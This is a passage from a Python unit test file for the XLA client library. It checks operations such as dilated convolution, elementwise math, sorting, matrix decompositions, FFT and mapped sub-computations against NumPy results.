a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
c.NextAfter(
c.Constant(np.array([1, 2], dtype=np.float32)),
c.Constant(np.array([2, 1], dtype=np.float32)))
out = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(np.array([eps + 1, 2 - eps], dtype=np.float32), out)
def testRegularizedIncompleteBeta(self):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538])
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606])
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677])
c = self._NewComputation()
c.RegularizedIncompleteBeta(c.Constant(a), c.Constant(b), c.Constant(x))
expected = np.array([0.98923271, 0.48575411, 0.57952568, 0.12579775,
0.96989155])
self._ExecuteAndCompareClose(c, expected=expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
